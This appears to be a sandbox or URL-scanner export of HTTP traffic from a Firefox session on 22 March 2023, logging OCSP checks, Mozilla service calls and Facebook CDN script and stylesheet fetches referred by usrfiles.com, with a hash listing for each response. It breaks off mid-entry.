POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "08378FE6A897AB5A9C8D3BC2748C9670659D0D0D164317FDFAC88D23FEE78FA0" Last-Modified: Sun, 19 Mar 2023 17:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=10742 Expires: Wed, 22 Mar 2023 06:31:53 GMT Date: Wed, 22 Mar 2023 03:32:51 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 28774b36cf8bb6b054329393a33f6239 Sha1: 728313ddff6d5ceb6db3eb8445f039779616a140 Sha256: 08378fe6a897ab5a9c8d3bc2748c9670659d0d0d164317fdfac88d23fee78fa0
GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	35.241.9.150 HTTP/2 200 OK content-type: application/json access-control-allow-origin: * access-control-expose-headers: Content-Type, Retry-After, Content-Length, Backoff, Alert content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; strict-transport-security: max-age=31536000 x-content-type-options: nosniff content-length: 939 via: 1.1 google date: Wed, 22 Mar 2023 03:15:00 GMT age: 1071 cache-control: max-age=3600,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (939), with no line terminators Size: 939 Md5: bc86ef2a0cee04915bc360f5821adc8f Sha1: 3658f9028cce204d38f7f48fcfaa2a8e4f54383a Sha256: aeecd718d03811322457de4f20828bdba86b277e7e0e328cae9c0a8075638454
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "905537EF3E3A4A9030391B44BD6AC6BB5D7C9EC752B1821D683DFBF483096163" Last-Modified: Sun, 19 Mar 2023 17:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=14686 Expires: Wed, 22 Mar 2023 07:37:37 GMT Date: Wed, 22 Mar 2023 03:32:51 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 4e6141892ec4705c6a0134f3157b969d Sha1: 4169fdea42b0fa9cb565e14b8e8fdb293575c78e Sha256: 905537ef3e3a4a9030391b44bd6ac6bb5d7c9ec752b1821d683dfbf483096163
GET /chains/remote-settings.content-signature.mozilla.org-2023-04-30-16-53-14.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	34.160.144.191 HTTP/2 200 OK content-type: binary/octet-stream x-amz-id-2: Q10sANKLj4s6v0TvsrT8DxN1nbxhFXni4/lkJHtDFoUNY+MUVmxN6xhAJt72B7/abm+okB/eipQ= x-amz-request-id: XPFKNHTT6S8TXWAN x-amz-server-side-encryption: AES256 content-disposition: attachment accept-ranges: bytes server: AmazonS3 content-length: 5348 via: 1.1 google date: Wed, 22 Mar 2023 02:59:22 GMT age: 2009 last-modified: Sat, 11 Mar 2023 16:53:15 GMT etag: "e7bace7c1e04d44012e37ddffe36e5d5" cache-control: public,max-age=3600 alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: PEM certificate\012- , ASCII text Size: 5348 Md5: e7bace7c1e04d44012e37ddffe36e5d5 Sha1: 3ac8d7c0a9d3e3f0b28b2530c7b8d8407b4042c2 Sha256: 6b4f80f2e95b26f6122ea8dcd0ef8d762299be822c69e839fc37581ca2bcb5f2
GET /v1/tiles HTTP/1.1 Host: contile.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	34.117.237.239 HTTP/2 200 OK content-type: application/json server: nginx date: Wed, 22 Mar 2023 03:32:51 GMT content-length: 12 access-control-allow-credentials: true vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers access-control-expose-headers: content-type strict-transport-security: max-age=31536000 via: 1.1 google alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with no line terminators Size: 12 Md5: 23e88fb7b99543fb33315b29b1fad9d6 Sha1: a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce Sha256: 7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2560 Cache-Control: max-age=121263 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:13:54 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F776) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2377 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:51 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F6AF) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2377 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:51 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F6D2) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2377 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:51 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F6AF) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2560 Cache-Control: max-age=121263 Date: Wed, 22 Mar 2023 03:32:51 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:13:54 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F776) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
GET /rsrc.php/v3/yU/r/ZFA2ZKi8_ij.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: 15JBb37LMIh48yJqRtiu4b5rJfkmGeXL7bd9BC6W6kEpuMNW230eSEgT69ZNR0DMXM+Qn3HkfJhLJjpdAd8fSw== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/yF/r/sAcaU2FJdDD.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: vZw7JiyIM2TjWI0iaNFdHGlXk+uA4qOYZQEtxg1jlLub2Ld5+3K09roCwL+2B8m+WtG5vopGQajDGBsUbdSCsg== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3i0VU4/yb/l/es_LA/29KpN-SSjEW.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: 803SrY03/88ViuZYJQ+4/wl3Za0XBhuJ/XEEP9U5K4BX0unlvs4sfOYvzW2ufB2D2gw/hNklbOZtWpMv1yaz5Q== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/yp/l/0,cross/SieMvexb4RV.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: MgKt8+bJgagmduuxBxYgcYA/habFttf1oSyysecrzd2YlaCBGlqrSrVBITKjWaPn940VdvMF9Tyo8N+7SITkXQ== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /rsrc.php/v3/y1/l/0,cross/v-qA4RoF1Br.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: IkbfYEsCWOJ2te5SgFmKbTgp0SmyGiCZbOthxqM12cX4vQGUYyq30fRqXauHzoxQn2j5dFSSnqD+lMUAdEaHcA== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	192.229.221.95 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 2378 Cache-Control: max-age=121080 Date: Wed, 22 Mar 2023 03:32:52 GMT Etag: "6419a392-1d7" Expires: Thu, 23 Mar 2023 13:10:52 GMT Last-Modified: Tue, 21 Mar 2023 12:31:14 GMT Server: ECAcc (ska/F775) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: e2ba316dbf0d1c231f12512204d0e832 Sha1: 16271f049892b4d07ab70043935b1873a2e423f9 Sha256: 99a5a7e359df4cc82ef7a931bc93c0252f28c938155c1a6bd886550a0709cb11
GET /rsrc.php/v3ivXO4/yZ/l/es_LA/wgQtNFI9dU-.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: script Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 404 Not Found content-type: text/html; charset="utf-8" x-fatal-request: static.xx.fbcdn.net pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT timing-allow-origin: * content-security-policy-report-only: default-src fbcdn.net .fbcdn.net fbsbx.com .fbsbx.com data: blob: chrome-extension: 'unsafe-inline' 'unsafe-eval';report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self';script-src .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src 'unsafe-inline';connect-src .fbcdn.net wss://*.fbcdn.net attachment.fbsbx.com blob: 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.xx.facebook.com/csp/reporting/?m=c&minimize=0;require-trusted-types-for 'script'; x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff x-xss-protection: 0 x-fb-debug: x4FASVN5RpbtjJECcXH8/COPcrujp+5C5l4AIsYNQErQrOgIc/iUnKWTTWY0xrohiGcbCjs0fPfid9UvRsSkYg== content-length: 0 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: Size: 0 Md5: d41d8cd98f00b204e9800998ecf8427e Sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	35.241.9.150 HTTP/2 200 OK content-type: application/json access-control-allow-origin: * access-control-expose-headers: ETag, Last-Modified, Retry-After, Content-Length, Alert, Cache-Control, Expires, Content-Type, Backoff, Pragma content-security-policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; strict-transport-security: max-age=31536000 x-content-type-options: nosniff content-length: 329 via: 1.1 google date: Wed, 22 Mar 2023 03:14:33 GMT age: 1099 last-modified: Fri, 25 Mar 2022 17:45:46 GMT etag: "1648230346554" cache-control: max-age=3600,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JSON data\012- , ASCII text, with very long lines (329), with no line terminators Size: 329 Md5: 0333b0655111aa68de771adfcc4db243 Sha1: 63f295a144ac87a7c8e23417626724eeca68a7eb Sha256: 60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /rsrc.php/v3/y2/l/0,cross/xJKJrMq7d3M.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 21 Mar 2024 03:32:52 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: JbSfI8YbGYe1S8cBOp7K+A== x-fb-debug: y5AcQXj11J3NJJX91LEEXaoX05WAOli5ncvN/P4sdoCmVj0Rh1iIAkewgfvxsSESfNfv4dZBFoZMKdmtnmt+MA== content-length: 3289 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (7535) Size: 3289 Md5: 25b49f23c61b1987b54bc7013a9ecaf8 Sha1: b76ffa665051c25dbae0d4ad186b6573e6592064 Sha256: e464203e8e625ad77c7dc5bd298fddb1b7364629eeb0a24310efa4944285c4bf
GET /rsrc.php/v3/yr/l/0,cross/80CKmjtnEKi.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site TE: trailers	157.240.205.11 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 21 Mar 2024 03:32:52 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: I46ebw2KMHiSMFEw41DOEw== x-fb-debug: sgh0aI2YdDMFKp7mXBCxpWvYWqQls4DwHnOfUTxfJ5wWz4pEsw+wu2hYqbJ4euqnIzx706YoCXIkbWmSbMjVzA== content-length: 4963 x-fb-trip-id: 1679558926 date: Wed, 22 Mar 2023 03:32:52 GMT alt-svc: h3=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info --- Magic: ASCII text, with very long lines (7489) Size: 4963 Md5: 238e9e6f0d8a307892305130e350ce13 Sha1: aa1c0b98bed8bddf70dceb4ce10ff57b314565dd Sha256: b3fd19b0ae45eacecfb8fc3973747a4a85505e3ecb2d2ad083b253808359cfb1
GET /rsrc.php/v3/y-/l/0,cross/NzQtERYtGB2.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1 Host: static.xx.fbcdn.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/css,/;q=0.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.usrfiles.com Connection: keep-alive Referer: http://www.usrfiles.com/ Sec-Fetch-Dest: style Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	157.240.205.11 HTTP/2 200 OK content-type: text/css; charset=utf-8 vary: Accept-Encoding content-encoding: br access-control-allow-origin: * last-modified: Mon, 01 Jan 2001 08:00:00 GMT expires: Thu, 21 Mar 2024 03:32:52 GMT cache-control: public,max-age=31536000,immutable x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin x-content-type-options: nosniff timing-allow-origin: * content-md5: woxMZEDmD9vzGGcgUpoOAA== x-fb-debug: 